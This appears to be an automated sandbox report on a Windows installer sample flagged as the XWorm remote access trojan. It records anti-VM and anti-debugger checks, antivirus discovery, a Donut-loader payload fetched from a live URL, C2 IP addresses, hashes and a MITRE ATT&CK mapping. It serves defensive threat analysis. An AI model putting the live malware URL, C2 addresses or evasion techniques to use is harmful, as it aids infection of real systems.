Source: C:\Users\user\Desktop\33-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\33-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\33-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\33-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\33-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\33-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\33-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\33-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\33-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\33-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\33-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\33-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\33-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\33-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\33-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\33-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\33-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\33-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\33-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\33-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\33-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\33-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\33-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\33-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\33-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\33-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\33-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\33-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\33-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\33-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\33-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\33-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\33-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\33-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\33-o_Installer.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController

Source: C:\Users\user\Desktop\33-o_Installer.exe	Memory allocated: 33F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\33-o_Installer.exe	Memory allocated: 3630000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\33-o_Installer.exe	Memory allocated: 3450000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\33-o_Installer.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\33-o_Installer.exe	Window / User API: threadDelayed 3374			Jump to behavior
Source: C:\Users\user\Desktop\33-o_Installer.exe	Window / User API: threadDelayed 6477			Jump to behavior

Source: C:\Users\user\Desktop\33-o_Installer.exe TID: 6536	Thread sleep time: -9223372036854770s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\33-o_Installer.exe TID: 6204	Thread sleep count: 3374 > 30	Jump to behavior
Source: C:\Users\user\Desktop\33-o_Installer.exe TID: 6204	Thread sleep count: 6477 > 30	Jump to behavior

Source: C:\Users\user\Desktop\33-o_Installer.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Users\user\Desktop\33-o_Installer.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior

Source: C:\Users\user\Desktop\33-o_Installer.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: 33-o_Installer.exe, 00000000.00000002.4497277372.0000000000AD8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWN
Source: 33-o_Installer.exe, 00000000.00000002.4497277372.0000000000A7E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0
Source: 33-o_Installer.exe, 00000000.00000002.4497277372.0000000000AD8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\33-o_Installer.exe	API call chain: ExitProcess graph end node			graph_0-25602
Source: C:\Users\user\Desktop\33-o_Installer.exe	API call chain: ExitProcess graph end node			graph_0-25785

Source: C:\Users\user\Desktop\33-o_Installer.exe

Code function: 0_2_00DC65D1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_00DC65D1

Source: C:\Users\user\Desktop\33-o_Installer.exe

0_2_00DD40E4

Source: C:\Users\user\Desktop\33-o_Installer.exe

Code function: 0_2_03371628 mov eax, dword ptr fs:[00000030h]

0_2_03371628

Source: C:\Users\user\Desktop\33-o_Installer.exe

Code function: 0_2_00DD7CB1 __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,

0_2_00DD7CB1

Source: C:\Users\user\Desktop\33-o_Installer.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\33-o_Installer.exe	Code function: 0_2_00DC65D1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00DC65D1
Source: C:\Users\user\Desktop\33-o_Installer.exe	Code function: 0_2_00DCA792 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00DCA792
Source: C:\Users\user\Desktop\33-o_Installer.exe	Code function: 0_2_00DCC78D SetUnhandledExceptionFilter,	0_2_00DCC78D

Source: C:\Users\user\Desktop\33-o_Installer.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\33-o_Installer.exe

Code function: 0_2_00DC1671 cpuid

0_2_00DC1671

Source: C:\Users\user\Desktop\33-o_Installer.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	0_2_00DCF895
Source: C:\Users\user\Desktop\33-o_Installer.exe	Code function: GetLocaleInfoA,	0_2_00DD4859
Source: C:\Users\user\Desktop\33-o_Installer.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	0_2_00DCE04E
Source: C:\Users\user\Desktop\33-o_Installer.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	0_2_00DCF9F8
Source: C:\Users\user\Desktop\33-o_Installer.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	0_2_00DCF9BC
Source: C:\Users\user\Desktop\33-o_Installer.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	0_2_00DCF955
Source: C:\Users\user\Desktop\33-o_Installer.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_00DCF4CD
Source: C:\Users\user\Desktop\33-o_Installer.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,	0_2_00DD44BA
Source: C:\Users\user\Desktop\33-o_Installer.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,	0_2_00DCECAA
Source: C:\Users\user\Desktop\33-o_Installer.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,	0_2_00DCDC2B
Source: C:\Users\user\Desktop\33-o_Installer.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	0_2_00DCF5C2
Source: C:\Users\user\Desktop\33-o_Installer.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	0_2_00DD4594
Source: C:\Users\user\Desktop\33-o_Installer.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	0_2_00DCF6C4
Source: C:\Users\user\Desktop\33-o_Installer.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	0_2_00DCF669
Source: C:\Users\user\Desktop\33-o_Installer.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,	0_2_00DC5FC5
Source: C:\Users\user\Desktop\33-o_Installer.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,	0_2_00DCEF98

Source: C:\Users\user\Desktop\33-o_Installer.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\33-o_Installer.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\33-o_Installer.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\33-o_Installer.exe

Code function: 0_2_00DC41BA GetSystemTimeAsFileTime,__aulldiv,

0_2_00DC41BA

Source: C:\Users\user\Desktop\33-o_Installer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\33-o_Installer.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected XWorm

Source: Yara match	File source: 0.2.33-o_Installer.exe.5820000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.33-o_Installer.exe.5820000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.4498830874.0000000005820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4498244402.0000000003631000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 33-o_Installer.exe PID: 4292, type: MEMORYSTR

Remote Access Functionality

Yara detected XWorm

Source: Yara match	File source: 0.2.33-o_Installer.exe.5820000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.33-o_Installer.exe.5820000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.4498830874.0000000005820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4498244402.0000000003631000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 33-o_Installer.exe PID: 4292, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Disable or Modify Tools	LSASS Memory	131 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	11 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	131 Virtualization/Sandbox Evasion	Security Account Manager	131 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Deobfuscate/Decode Files or Information	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	34 System Information Discovery	SSH	Keylogging	12 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Software Packing	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
33-o_Installer.exe	32%	ReversingLabs	Win32.Trojan.Doina
33-o_Installer.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
http://guanlix.cn:881/33.ccp~	0%	Avira URL Cloud	safe
117.41.184.33	0%	Avira URL Cloud	safe
http://guanlix.cn:881/33.ccp	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
guanlix.cn	91.208.240.157	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://guanlix.cn:881/33.ccp	false	Avira URL Cloud: safe	unknown
117.41.184.33	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://guanlix.cn:881/33.ccp~	33-o_Installer.exe, 00000000.00000002.4497277372.0000000000ABB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	33-o_Installer.exe, 00000000.00000002.4498244402.0000000003631000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
91.208.240.157	guanlix.cn	unknown		139659	LUCID-AS-APLUCIDACLOUDLIMITEDHK	false
117.41.184.33	unknown	China		134238	CT-JIANGXI-IDCCHINANETJiangxprovinceIDCnetworkCN	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1466306
Start date and time:	2024-07-02 19:20:06 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 41s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	4
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	33-o_Installer.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@1/2@1/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 28 Number of non-executed functions: 33
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: 33-o_Installer.exe

Simulations

Behavior and APIs

Time	Type	Description
13:21:01	API Interceptor	8913172x Sleep call for process: 33-o_Installer.exe modified

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CT-JIANGXI-IDCCHINANETJiangxprovinceIDCnetworkCN	https://seoauthoritybook.com/	Get hash	malicious	Unknown	Browse	106.225.194.35
	skt.m68k.elf	Get hash	malicious	Mirai	Browse	59.63.219.186
	#U5458#U5de5#U8865#U52a9#U6d41#U7a0b.docx.doc	Get hash	malicious	Unknown	Browse	59.63.226.86
	2024#U5e74#U4e8c#U5b63#U5ea6#U5458#U5de5#U8865#U52a9#U6d41#U7a0b.docx.doc	Get hash	malicious	Unknown	Browse	59.63.226.86
	SecuriteInfo.com.Trojan.Siggen22.58997.11289.5716.exe	Get hash	malicious	Poisonivy	Browse	106.225.194.35
	2024#U5e74#U4e00#U5b63#U5ea6#U5458#U5de5#U8865#U52a9#U6d41#U7a0b.docx.doc	Get hash	malicious	Unknown	Browse	59.63.226.86
	2024#U5e74#U4e00#U5b63#U5ea6#U5458#U5de5#U8865#U52a9#U6d41#U7a0b.docx.doc	Get hash	malicious	Unknown	Browse	59.63.226.86
	pKO4Qel23K.elf	Get hash	malicious	Mirai	Browse	59.63.167.214
	JKfLgrv17o.elf	Get hash	malicious	Mirai	Browse	59.63.219.189
	JKtUqTCOma.elf	Get hash	malicious	Mirai	Browse	59.63.167.208
LUCID-AS-APLUCIDACLOUDLIMITEDHK	https://telegram-wv.icu/	Get hash	malicious	Unknown	Browse	103.143.81.212
	#U6ce1#U6ce1#U7801#U5ba2#U6237#U7aef.exe	Get hash	malicious	Unknown	Browse	45.136.13.176
	#U6ce1#U6ce1#U7801#U5ba2#U6237#U7aef.exe	Get hash	malicious	Unknown	Browse	45.136.13.176
	CXM5Rc4W2k.exe	Get hash	malicious	GhostRat	Browse	103.143.81.180
	CXM5Rc4W2k.exe	Get hash	malicious	GhostRat	Browse	103.143.81.180
	dllhostpgd.exe	Get hash	malicious	CobaltStrike	Browse	45.136.14.159
	dllhostpgd.exe	Get hash	malicious	CobaltStrike	Browse	45.136.14.159
	qrUvlKkf7N.elf	Get hash	malicious	Mirai	Browse	45.144.137.162
	qwb3x7yFdW.elf	Get hash	malicious	Mirai	Browse	45.144.137.183
	sora.arm.elf	Get hash	malicious	Mirai	Browse	45.144.137.155

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\Public\Downloads\ind.cod

Download File

Process:	C:\Users\user\Desktop\33-o_Installer.exe
File Type:	data
Category:	dropped
Size (bytes):	71938
Entropy (8bit):	7.604676564541333
Encrypted:	false
SSDEEP:	1536:u7rl7/dDEWTG0KHvpLhkUsYywwI6aM6eKXBwLsy1ETqfvu+P4Rtsj5o:enTG0KBLfsYywwTaMRKXBwLs/
MD5:	1BEA636EC9B170D6306D6082552DD002
SHA1:	920644E8AA039A829A58C4EF7065B61208795605
SHA-256:	D90BF4D25240AA036B21D8FDF1F1F3F55CD03C61EAB7F941624F96D3C70AACFC
SHA-512:	DCCDE5A72EF3203CD68AE6497B9D9D5322387F7196F66C1042D16F3F54AB12A6955CBD1E286477089C601041208E8F017D5BDFB003CDBD377054BC975D2139D7
Malicious:	false
Yara Hits:	Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: C:\Users\Public\Downloads\ind.cod, Author: unknown
Reputation:	low
Preview:	.......Xm.0N~.2.oi...../:..#E......5.....r..V...Q.Z.....x...G.......2.....\|'......B.u...\...d#..>.....H..n'...H4n...W.......k..>...W4......w..J...Z..$@.../....M?..=o...'.z.....$....%....Y..".).\|.?.Q.:u.]l....L.GP.f.../L.izV..n.Hv...{.Ua.x..BV.OS....\|.$;..@a`.._........}....k....M..'(.............................................................................................................................................................................................................................................................(j...Y....Y.2..I..PZ.P..k<.AT...HYZ.Ip3.7...\..<.m`.......w...(.gw..!.).@{...3....h".l....=.jz.Z^T.V.k^[W...J....\s.>...W.y....N..n..."..j....X....B....d.Z.....L..x. ...{.J1_.\.........<p.N......oND..?=./N.r.*..X<..8.....:P..H.M......Ot.^....\|".X...E...?...i....I'.g...]Ek.....(..E]..F.,..A}..?...t.Q. }5l....\TT...$......N.....fHP9.#3.qKo.x...~..k.k...hN;.........<_.r.m{.o..R.p?..-..E......k.......aj`.=..d..2

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\33[1].ccp

Download File

Process:	C:\Users\user\Desktop\33-o_Installer.exe
File Type:	data
Category:	dropped
Size (bytes):	71938
Entropy (8bit):	7.604676564541333
Encrypted:	false
SSDEEP:	1536:u7rl7/dDEWTG0KHvpLhkUsYywwI6aM6eKXBwLsy1ETqfvu+P4Rtsj5o:enTG0KBLfsYywwTaMRKXBwLs/
MD5:	1BEA636EC9B170D6306D6082552DD002
SHA1:	920644E8AA039A829A58C4EF7065B61208795605
SHA-256:	D90BF4D25240AA036B21D8FDF1F1F3F55CD03C61EAB7F941624F96D3C70AACFC
SHA-512:	DCCDE5A72EF3203CD68AE6497B9D9D5322387F7196F66C1042D16F3F54AB12A6955CBD1E286477089C601041208E8F017D5BDFB003CDBD377054BC975D2139D7
Malicious:	false
Yara Hits:	Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\33[1].ccp, Author: unknown
Reputation:	low
Preview:	.......Xm.0N~.2.oi...../:..#E......5.....r..V...Q.Z.....x...G.......2.....\|'......B.u...\...d#..>.....H..n'...H4n...W.......k..>...W4......w..J...Z..$@.../....M?..=o...'.z.....$....%....Y..".).\|.?.Q.:u.]l....L.GP.f.../L.izV..n.Hv...{.Ua.x..BV.OS....\|.$;..@a`.._........}....k....M..'(.............................................................................................................................................................................................................................................................(j...Y....Y.2..I..PZ.P..k<.AT...HYZ.Ip3.7...\..<.m`.......w...(.gw..!.).@{...3....h".l....=.jz.Z^T.V.k^[W...J....\s.>...W.y....N..n..."..j....X....B....d.Z.....L..x. ...{.J1_.\.........<p.N......oND..?=./N.r.*..X<..8.....:P..H.M......Ot.^....\|".X...E...?...i....I'.g...]Ek.....(..E]..F.,..A}..?...t.Q. }5l....\TT...$......N.....fHP9.#3.qKo.x...~..k.k...hN;.........<_.r.m{.o..R.p?..-..E......k.......aj`.=..d..2

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.939909088547916
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	33-o_Installer.exe
File size:	249'344 bytes
MD5:	baf30c254157b0f36a967ccfdb3850ed
SHA1:	0734a94d3cd6b3048d6d99c26b1fdea0cd19ab00
SHA256:	af40db9d594f00fe032b9b50177907efc872157abd3ab488c09584a0ceb3da04
SHA512:	dbe3cbcf9f72c3e57ebb2161ef8fcc96c55aa39e960ce498f22163f0c554cbbb291d3f33378569a3213c57fe810e78cb547f265fd4cc2d6e72ea4f8a7c2d4dc7
SSDEEP:	3072:euWmO3uTwghfpRBCa5XrD5sxTQ14b7QNaV4ZQeAnuTCt2xbzmyoaq6rcYsc8kOee:euW4TwSR57aTQ+QN4njZ2x0p
TLSH:	63346B92F6C0D4B6D81711B5D83ADEB2126BBD798974010B36A4372F5EB72831937E0B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.q>...m...m...mj..m...mj..m...m...m...m...m_..mj..m1..mj..m...mj..m...mRich...m........PE..L......f.................v...T.....

File Icon


Icon Hash:	20246c0c56e20926

Static PE Info

General

Entrypoint:	0x405b41
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x66820682 [Mon Jul 1 01:29:38 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	0b47c746b58dc722dcec07246158fda2

Entrypoint Preview

Instruction
call 00007F48F47DCEC5h
jmp 00007F48F47D592Eh
mov edi, edi
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
test eax, eax
je 00007F48F47D5AB4h
sub eax, 08h
cmp dword ptr [eax], 0000DDDDh
